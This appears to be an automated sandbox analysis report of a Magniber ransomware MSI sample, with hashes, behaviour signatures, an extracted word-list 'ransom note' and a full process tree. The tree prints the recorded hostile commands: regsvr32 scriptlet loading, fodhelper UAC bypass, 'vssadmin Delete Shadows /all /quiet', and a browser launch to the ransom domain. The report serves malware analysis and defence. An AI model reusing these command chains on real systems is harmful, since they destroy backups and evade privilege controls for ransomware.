Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2022 23:15

General

  • Target

    ddf798fa09f7c72f9fec4478841990d7.msi

  • Size

    92KB

  • MD5

    ddf798fa09f7c72f9fec4478841990d7

  • SHA1

    42b8bc580bd77c330432fb7cf6d9b8c8212961bd

  • SHA256

    b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a

  • SHA512

    fa39bd42f000e8dffb4638a65cb08ab0f4393a7ed8ef718efa7f3652c00cd1aa31c6f3fb5365674700a08eb066d3e514e7f8131fce0bccd9b5897ea96c9b2425

  • SSDEEP

    768:8lUJ5BxTORGx4/dpZ6G+jzI/RyGwaW27N5MSdm4cyWMDC/yWMDCmYinj:hxTcdpZ6G//RzwaN1d00DU0D37n

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\3064_104092216\us_tv_and_film.txt

Ransom Note
you i to that it me what this know i'm no have my don't just not do be your we it's so but all well oh about right you're get here out going like yeah if can up want think that's now go him how got did why see come good really look will okay back can't mean tell i'll hey he's could didn't yes something because say take way little make need gonna never we're too she's i've sure our sorry what's let thing maybe down man very there's should anything said much any even off please doing thank give thought help talk god still wait find nothing again things let's doesn't call told great better ever night away believe feel everything you've fine last keep does put around stop they're i'd guy isn't always listen wanted guys huh those big lot happened thanks won't trying kind wrong talking guess care bad mom remember getting we'll together dad leave understand wouldn't actually hear baby nice father else stay done wasn't course might mind every enough try hell came someone you'll whole yourself idea ask must coming looking woman room knew tonight real son hope went hmm happy pretty saw girl sir friend already saying next job problem minute thinking haven't heard honey matter myself couldn't exactly having probably happen we've hurt boy dead gotta alone excuse start kill hard you'd today car ready without wants hold wanna yet seen deal once gone morning supposed friends head stuff worry live truth face forget true cause soon knows telling wife who's chance run move anyone person bye somebody heart miss making meet anyway phone reason damn lost looks bring case turn wish tomorrow kids trust check change anymore least aren't working makes taking means brother hate ago says beautiful gave fact crazy sit afraid important rest fun kid word watch glad everyone sister minutes everybody bit couple whoa either mrs feeling daughter wow gets asked break promise door close hand easy question tried far walk needs mine killed hospital anybody alright wedding shut able die perfect stand comes hit waiting dinner funny husband almost pay answer cool eyes news child shouldn't yours moment sleep read where's sounds sonny pick sometimes bed date plan hours lose hands serious shit behind inside ahead week wonderful fight past cut quite he'll sick it'll eat nobody goes save seems finally lives worried upset carly met brought seem sort safe weren't leaving front shot loved asking running clear figure hot felt parents drink absolutely how's daddy sweet alive sense meant happens bet blood ain't kidding lie meeting dear seeing sound fault ten buy hour speak lady jen thinks christmas outside hang possible worse mistake ooh handle spend totally giving here's marriage realize unless sex send needed scared picture talked ass hundred changed completely explain certainly sign boys relationship loves hair lying choice anywhere future weird luck she'll turned touch kiss crane questions obviously wonder pain calling somewhere throw straight cold fast words food none drive feelings they'll marry drop cannot dream protect twenty surprise sweetheart poor looked mad except gun y'know dance takes appreciate especially situation besides pull hasn't worth sheridan amazing expect swear piece busy happening movie we'd catch perhaps step fall watching kept darling dog honor moving till admit problems murder he'd evil definitely feels honest eye broke missed longer dollars tired evening starting entire trip niles suppose calm imagine fair caught blame sitting favor apartment terrible clean learn frasier relax accident wake prove smart message missing forgot interested table nbsp mouth pregnant ring careful shall dude ride figured wear shoot stick follow angry write stopped ran standing forgive jail wearing ladies kinda lunch cristian greenlee gotten hoping phoebe thousand ridge paper tough tape count boyfriend proud agree birthday they've share offer hurry feet wondering decision ones finish voice herself would've mess deserve evidence cute dress interesting hotel enjoy quiet concerned staying beat sweetie mention clothes fell neither mmm fix respect prison attention holding calls surprised bar keeping gift hadn't putting dark owe ice helping normal aunt lawyer apart plans jax girlfriend floor whether everything's box judge upstairs sake mommy possibly worst acting accept blow strange saved conversation plane mama yesterday lied quick lately stuck difference store she'd bought doubt listening walking cops deep dangerous buffy sleeping chloe rafe join card crime gentlemen willing window walked guilty likes fighting difficult soul joke favorite uncle promised bother seriously cell knowing broken advice somehow paid losing push helped killing boss liked innocent rules learned thirty risk letting speaking ridiculous afternoon apologize nervous charge patient boat how'd hide detective planning huge breakfast horrible awful pleasure driving hanging picked sell quit apparently dying notice congratulations visit could've c'mon letter decide forward fool showed smell seemed spell memory pictures slow seconds hungry hearing kitchen ma'am should've realized kick grab discuss fifty reading idiot suddenly agent destroy bucks shoes peace arms demon livvie consider papers incredible witch drunk attorney tells knock ways gives nose skye turns keeps jealous drug sooner cares plenty extra outta weekend matters gosh opportunity impossible waste pretend jump eating proof slept arrest breathe perfectly warm pulled twice easier goin dating suit romantic drugs comfortable finds checked divorce begin ourselves closer ruin smile laugh treat fear what'd otherwise excited mail hiding stole pacey noticed fired excellent bringing bottom note sudden bathroom honestly sing foot remind charges witness finding tree dare hardly that'll steal silly contact teach shop plus colonel fresh trial invited roll reach dirty choose emergency dropped butt credit obvious locked loving nuts agreed prue goodbye condition guard fuckin grow cake mood crap crying belong partner trick pressure dressed taste neck nurse raise lots carry whoever drinking they'd breaking file lock wine spot paying assume asleep turning viki bedroom shower nikolas camera fill reasons forty bigger nope breath doctors pants freak movies folks cream wild truly desk convince client threw hurts spending answers shirt chair rough doin sees ought empty wind aware dealing pack tight hurting guest arrested salem confused surgery expecting deacon unfortunately goddamn bottle beyond whenever pool opinion starts jerk secrets falling necessary barely dancing tests copy cousin ahem twelve tess skin fifteen speech orders complicated nowhere escape biggest restaurant grateful usual burn address someplace screw everywhere regret goodness mistakes details responsibility suspect corner hero dumb terrific whoo hole memories o'clock teeth ruined bite stenbeck liar showing cards desperate search pathetic spoke scare marah afford settle stayed checking hired heads concern blew alcazar champagne connection tickets happiness saving kissing hated personally suggest prepared onto downstairs ticket it'd loose holy duty convinced throwing kissed legs loud saturday babies where'd warning miracle carrying blind ugly shopping hates sight bride coat clearly celebrate brilliant wanting forrester lips custody screwed buying toast thoughts reality lexie attitude advantage grandfather sami grandma someday roof marrying powerful grown grandmother fake must've ideas exciting familiar bomb bout harmony schedule capable practically correct clue forgotten appointment deserves threat bloody lonely shame jacket hook scary investigation invite shooting lesson criminal victim funeral considering burning strength harder sisters pushed shock pushing heat chocolate miserable corinthos nightmare brings zander crash chances sending recognize healthy boring feed engaged headed treated knife drag badly hire paint pardon behavior closet warn gorgeous milk survive ends dump rent remembered thanksgiving rain revenge prefer spare pray disappeared aside statement sometime meat fantastic breathing laughing stood affair ours depends protecting jury brave fingers murdered explanation picking blah stronger handsome unbelievable anytime shake oakdale wherever pulling facts waited lousy circumstances disappointed weak trusted license nothin trash understanding slip sounded awake friendship stomach weapon threatened mystery vegas understood basically switch frankly cheap lifetime deny clock garbage why'd tear ears indeed changing singing tiny decent avoid messed filled touched disappear exact pills kicked harm fortune pretending insurance fancy drove cared belongs nights lorelai lift timing guarantee chest woke burned watched heading selfish drinks doll committed elevator freeze noise wasting ceremony uncomfortable staring files bike stress permission thrown possibility borrow fabulous doors screaming bone xander what're meal apology anger honeymoon bail parking fixed wash stolen sensitive stealing photo chose lets comfort worrying pocket mateo bleeding shoulder ignore talent tied garage dies demons dumped witches rude crack bothering radar soft meantime gimme kinds fate concentrate throat prom messages intend ashamed somethin manage guilt interrupt guts tongue shoe basement sentence purse glasses cabin universe repeat mirror wound travers tall engagement therapy emotional jeez decisions soup thrilled stake chef moves extremely moments expensive counting shots kidnapped cleaning shift plate impressed smells trapped aidan knocked charming attractive argue puts whip embarrassed package hitting bust stairs alarm pure nail nerve incredibly walks dirt stamp terribly friendly damned jobs suffering disgusting stopping deliver riding helps disaster bars crossed trap talks eggs chick threatening spoken introduce confession embarrassing bags impression gate reputation presents chat suffer argument talkin crowd homework coincidence cancel pride solve hopefully pounds pine mate illegal generous outfit maid bath punch freaked begging recall enjoying prepare wheel defend signs painful yourselves maris that'd suspicious cooking button warned sixty pity yelling awhile confidence offering pleased panic hers gettin refuse grandpa testify choices cruel mental gentleman coma cutting proteus guests expert benefit faces jumped toilet sneak halloween privacy smoking reminds twins swing solid options commitment crush ambulance wallet gang eleven option laundry assure stays skip fail discussion clinic betrayed sticking bored mansion soda sheriff suite handled busted load happier studying romance procedure commit assignment suicide minds swim yell llanview chasing proper believes humor hopes lawyers giant latest escaped parent tricks insist dropping cheer medication flesh routine sandwich handed false beating warrant awfully odds treating thin suggesting fever sweat silent clever sweater mall sharing assuming judgment goodnight divorced surely steps confess math listened comin answered vulnerable bless dreaming chip zero pissed nate kills tears knees chill brains unusual packed dreamed cure lookin grave cheating breaks locker gifts awkward thursday joking reasonable dozen curse quartermaine millions dessert rolling detail alien delicious closing vampires wore tail secure salad murderer spit offense dust conscience bread answering lame invitation grief smiling pregnancy prisoner delivery guards virus shrink freezing wreck massimo wire technically blown anxious cave holidays cleared wishes caring candles bound charm pulse jumping jokes boom occasion silence nonsense frightened slipped dimera blowing relationships kidnapping spin tool roxy packing blaming wrap obsessed fruit torture personality there'll fairy necessarily seventy print motel underwear grams exhausted believing freaking carefully trace touching messing recovery intention consequences belt sacrifice courage enjoyed attracted remove testimony intense heal defending unfair relieved loyal slowly buzz alcohol surprises psychiatrist plain attic who'd uniform terrified cleaned zach threaten fella enemies satisfied imagination hooked headache forgetting counselor andie acted badge naturally frozen sakes appropriate trunk dunno costume sixteen impressive kicking junk grabbed understands describe clients owns affect witnesses starving instincts happily discussing deserved strangers surveillance admire questioning dragged barn deeply wrapped wasted tense hoped fellas roommate mortal fascinating stops arrangements agenda literally propose honesty underneath sauce promises lecture eighty torn shocked backup differently ninety deck biological pheebs ease creep waitress telephone ripped raising scratch rings prints thee arguing ephram asks oops diner annoying taggert sergeant blast towel clown habit creature bermuda snap react paranoid handling eaten therapist comment sink reporter nurses beats priority interrupting warehouse loyalty inspector pleasant excuses threats guessing tend praying motive unconscious mysterious unhappy tone switched rappaport sookie neighbor loaded swore piss balance toss misery thief squeeze lobby goa'uld geez exercise forth booked sandburg poker eighteen d'you bury everyday digging creepy wondered liver hmmm magical fits discussed moral helpful searching flew depressed aisle cris amen vows neighbors darn cents arrange annulment useless adventure resist fourteen celebrating inch debt violent sand teal'c celebration reminded phones paperwork emotions stubborn pound tension stroke steady overnight chips beef suits boxes cassadine collect tragedy spoil realm wipe surgeon stretch stepped nephew neat limo confident perspective climb punishment finest springfield hint furniture blanket twist proceed fries worries niece gloves soap signature disappoint crawl convicted flip counsel doubts crimes accusing shaking remembering hallway halfway bothered madam gather cameras blackmail symptoms rope ordinary imagined cigarette supportive explosion trauma ouch furious cheat avoiding whew thick oooh boarding approve urgent shhh misunderstanding drawer phony interfere catching bargain tragic respond punish penthouse thou rach ohhh insult bugs beside begged absolute strictly socks senses sneaking reward polite checks tale physically instructions fooled blows tabby bitter adorable y'all tested suggestion jewelry alike jacks distracted s

Signatures

  • Detect magniber ransomware 2 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 3 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
      2⤵
      • Modifies registry class
      PID:1652
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
        PID:3904
        • C:\Windows\system32\fodhelper.exe
          fodhelper.exe
          3⤵
            PID:3556
            • C:\Windows\system32\regsvr32.exe
              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
              4⤵
                PID:1496
                • C:\Windows\System32\vssadmin.exe
                  "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                  5⤵
                  • Interacts with shadow copies
                  PID:4280
          • C:\Windows\system32\cmd.exe
            cmd /c "start fodhelper.exe"
            2⤵
              PID:5276
              • C:\Windows\system32\fodhelper.exe
                fodhelper.exe
                3⤵
                  PID:5440
                  • C:\Windows\system32\regsvr32.exe
                    "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
                    4⤵
                      PID:5572
                      • C:\Windows\System32\vssadmin.exe
                        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                        5⤵
                        • Interacts with shadow copies
                        PID:5740
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:2448
                • C:\Windows\system32\regsvr32.exe
                  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
                  2⤵
                  • Modifies registry class
                  PID:4976
                • C:\Windows\system32\cmd.exe
                  cmd /c "start fodhelper.exe"
                  2⤵
                    PID:3672
                    • C:\Windows\system32\fodhelper.exe
                      fodhelper.exe
                      3⤵
                        PID:2756
                        • C:\Windows\system32\regsvr32.exe
                          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
                          4⤵
                            PID:1600
                            • C:\Windows\System32\vssadmin.exe
                              "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                              5⤵
                              • Interacts with shadow copies
                              PID:3240
                      • C:\Windows\system32\cmd.exe
                        cmd /c "start fodhelper.exe"
                        2⤵
                          PID:5252
                          • C:\Windows\system32\fodhelper.exe
                            fodhelper.exe
                            3⤵
                              PID:5412
                              • C:\Windows\system32\regsvr32.exe
                                "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
                                4⤵
                                  PID:5552
                                  • C:\Windows\System32\vssadmin.exe
                                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                    5⤵
                                    • Interacts with shadow copies
                                    PID:5708
                          • C:\Windows\system32\sihost.exe
                            sihost.exe
                            1⤵
                            • Modifies registry class
                            • Suspicious use of WriteProcessMemory
                            PID:2408
                            • C:\Windows\system32\regsvr32.exe
                              regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
                              2⤵
                              • Modifies registry class
                              PID:2656
                            • C:\Windows\system32\cmd.exe
                              cmd /c "start fodhelper.exe"
                              2⤵
                                PID:4300
                                • C:\Windows\system32\fodhelper.exe
                                  fodhelper.exe
                                  3⤵
                                    PID:2252
                                    • C:\Windows\system32\regsvr32.exe
                                      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
                                      4⤵
                                        PID:3568
                                        • C:\Windows\System32\vssadmin.exe
                                          "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                          5⤵
                                          • Interacts with shadow copies
                                          PID:2984
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c "start fodhelper.exe"
                                    2⤵
                                      PID:5260
                                      • C:\Windows\system32\fodhelper.exe
                                        fodhelper.exe
                                        3⤵
                                          PID:5400
                                          • C:\Windows\system32\regsvr32.exe
                                            "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
                                            4⤵
                                              PID:5528
                                              • C:\Windows\System32\vssadmin.exe
                                                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                                5⤵
                                                • Interacts with shadow copies
                                                PID:5672
                                      • C:\Windows\system32\msiexec.exe
                                        msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ddf798fa09f7c72f9fec4478841990d7.msi
                                        1⤵
                                        • Blocklisted process makes network request
                                        • Enumerates connected drives
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        PID:4888
                                      • C:\Windows\system32\msiexec.exe
                                        C:\Windows\system32\msiexec.exe /V
                                        1⤵
                                        • Enumerates connected drives
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:1952
                                        • C:\Windows\system32\srtasks.exe
                                          C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                          2⤵
                                            PID:4264
                                          • C:\Windows\System32\MsiExec.exe
                                            C:\Windows\System32\MsiExec.exe -Embedding 0CB3A02F93E90B8853234F11696B31B8
                                            2⤵
                                            • Modifies extensions of user files
                                            • Loads dropped DLL
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: MapViewOfSection
                                            • Suspicious use of WriteProcessMemory
                                            PID:1928
                                            • C:\Windows\System32\cmd.exe
                                              cmd /c "start microsoft-edge:http://48a8002834vpkrzajx.ridits.info/vpkrzajx^&1^&60119478^&75^&375^&2219041
                                              3⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4468
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://48a8002834vpkrzajx.ridits.info/vpkrzajx&1&60119478&75&375&2219041
                                                4⤵
                                                • Adds Run key to start application
                                                • Enumerates system info in registry
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of WriteProcessMemory
                                                PID:3064
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffad80d46f8,0x7ffad80d4708,0x7ffad80d4718
                                                  5⤵
                                                    PID:2184
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
                                                    5⤵
                                                      PID:528
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
                                                      5⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4260
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
                                                      5⤵
                                                        PID:1712
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
                                                        5⤵
                                                          PID:2008
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
                                                          5⤵
                                                            PID:1036
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5356 /prefetch:8
                                                            5⤵
                                                              PID:3792
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
                                                              5⤵
                                                                PID:388
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:1
                                                                5⤵
                                                                  PID:1536
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5536 /prefetch:8
                                                                  5⤵
                                                                    PID:1052
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                                                                    5⤵
                                                                      PID:4020
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
                                                                      5⤵
                                                                        PID:3044
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
                                                                        5⤵
                                                                          PID:296
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                          5⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:3904
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff76bc35460,0x7ff76bc35470,0x7ff76bc35480
                                                                            6⤵
                                                                              PID:4644
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
                                                                            5⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:3560
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                                                                            5⤵
                                                                              PID:5152
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
                                                                              5⤵
                                                                                PID:5936
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1872 /prefetch:8
                                                                                5⤵
                                                                                  PID:6032
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3128 /prefetch:8
                                                                                  5⤵
                                                                                    PID:6100
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:8
                                                                                    5⤵
                                                                                      PID:4468
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2004 /prefetch:8
                                                                                      5⤵
                                                                                        PID:3304
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3180 /prefetch:8
                                                                                        5⤵
                                                                                          PID:4068
